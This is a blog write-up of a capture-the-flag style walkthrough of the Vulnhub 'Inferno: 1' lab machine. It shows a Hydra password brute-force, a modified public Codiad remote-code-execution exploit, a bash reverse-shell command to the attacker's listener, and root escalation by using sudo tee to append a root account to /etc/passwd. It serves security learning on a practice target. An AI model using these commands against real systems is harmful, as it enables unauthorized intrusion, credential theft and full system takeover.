---
layout: post
title:  "Vulnhub - INFERNO: 1"
date:   2020-12-04 23:00:00 +1100
category: hacking
---

## Introduction
*Real Life machine vs CTF.*

*Midway upon the journey of our life I found myself within a forest dark,   
For the straightforward pathway had been lost.  
Ah me! how hard a thing it is to say  
What was this forest savage, rough, and stern,  
Which in the very thought renews the fear.*  

Sidenote: the quote above is from Inferno, Canto I by *Dante Alighieri*, part of the [Divine Comedy](https://en.wikipedia.org/wiki/Divine_Comedy). As I read it, it is basically the same as the introduction to one of my favourite Alkaline Trio songs, **I Found Away**:

*Midway on our life's journey, I found myself  
In dark woods, the right road lost. To tell  
About those woods is hard - so tangled and rough  
And savage that thinking of it now, I feel  
The old fear stirring....*

This is [Inferno: 1](https://www.vulnhub.com/entry/inferno-1,603/) from Vulnhub.

## Ports
This box was using port spoofing and reported having 1147 open ports. Yuck. I assumed there was a website; there was.

## HTTP
It doesn't take much gobusting to find our target; the directory we want is */inferno/*. It's protected by basic authentication, but we can Hydra that:

{% highlight shell %}
root@kali:/opt/vulnhub/inferno# hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt 192.168.1.152 http-get /inferno/
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-04 05:21:35
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.1.152:80/inferno/
[STATUS] 8009.00 tries/min, 8009 tries in 00:01h, 14336390 to do in 29:51h, 16 active
[80][http-get] host: 192.168.1.152   login: admin   password: dante1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-04 05:23:29
{% endhighlight %}

## Codiad
The site is running [Codiad](http://codiad.com/), a sort of in browser IDE that I hadn't seen before. It looks pretty neat but it's now [unmaintained](https://github.com/Codiad/Codiad) and there is an [exploit](https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit) available. 

I had to make a few changes to the exploit code it get it running, which was mostly adding the basic authentication header to the network calls; there were three of them. As an example, this is what the *get_write_able_path* function became:

{% highlight python %}
def get_write_able_path(domain):
    global session
    url = domain + "/components/project/controller.php?action=get_current"
    headers = {
        "Authorization": "Basic YWRtaW46ZGFudGUx"
    }
    response = session.get(url, verify=False, headers=headers)
    content = response.content
    print "[+] Path Content : %s" % (content)
    json_obj = json.loads(content)
    # print(json_obj) # debug
    if json_obj['status'] == "success":
        return json_obj['data']['path']
    else:
        return False
{% endhighlight %}

And once the code modifications were made, we could get a shell:

{% highlight shell %}
root@kali:/opt/vulnhub/inferno# ./exploit.py http://192.168.1.152/inferno admin dante1 192.168.1.150 1234 linux
[+] Please execute the following command on your vps: 
echo 'bash -c "bash -i >/dev/tcp/192.168.1.150/1235 0>&1 2>&1"' | nc -lnvp 1234
nc -lnvp 1235
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"admin"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"inferno","path":"\/var\/www\/html\/inferno"}}
[+] Writeable Path : /var/www/html/inferno
[+] Sending payload...
http://192.168.1.152/inferno/components/filemanager/controller.php?type=1&action=search&path=/var/www/html/inferno
{% endhighlight %}

## Shell
After that I was on the box as *www-data*, and we only had one user with a home directory - *dante*. He's got a file we can read:

{% highlight shell %}
www-data@Inferno:/home/dante/Downloads$ file download.dat
file download.dat
download.dat: ASCII text, with very long lines, with no line terminators
4.0K -rw-r--r--  1 www-data www-data 1.5K Nov  3 11:52 download.dat
{% endhighlight %}

This is a space-delimited hex encoded file that contains some verse, and some creds:

>dante:V1rg1l10h3lpm3

## SSH + Privesc
Remember the port spoofing and how I got lucky with the webserver on port 80? Well, SSH was on the standard port too, and *dante* had sudo access to **tee**. tee reads from standard input and writes to a file, so I added my favourite *root2* user with the password *mrcake* to */etc/passwd*. This is slightly different to what GTFOBins suggested, but the concept is the same. Enjoy:

{% highlight shell %}
root@kali:/opt/vulnhub/inferno# ssh dante@192.168.1.152
The authenticity of host '192.168.1.152 (192.168.1.152)' cant be established.
ECDSA key fingerprint is SHA256:5eMSIG2JrA2xEfQlgC7P3KruDMWuL5zBOhcYqj1nefg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.152' (ECDSA) to the list of known hosts.
dante@192.168.1.152 password: 
Linux Inferno 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Nov 17 07:45:38 2020 from 10.1.3.27
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /bin/tee
dante@Inferno:~$ sudo -u root /bin/tee -a /etc/passwd
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash
dante@Inferno:~$ su root2
Password: 
root@Inferno:/home/dante# cd /root
root@Inferno:~# ls
proof.txt
root@Inferno:~# cat proof.txt 

ASCII ART REMOVED

Congrats!

Youve rooted Inferno!
{% endhighlight %}

Thanks [mindsflee](https://www.hackthebox.eu/profile/232477).
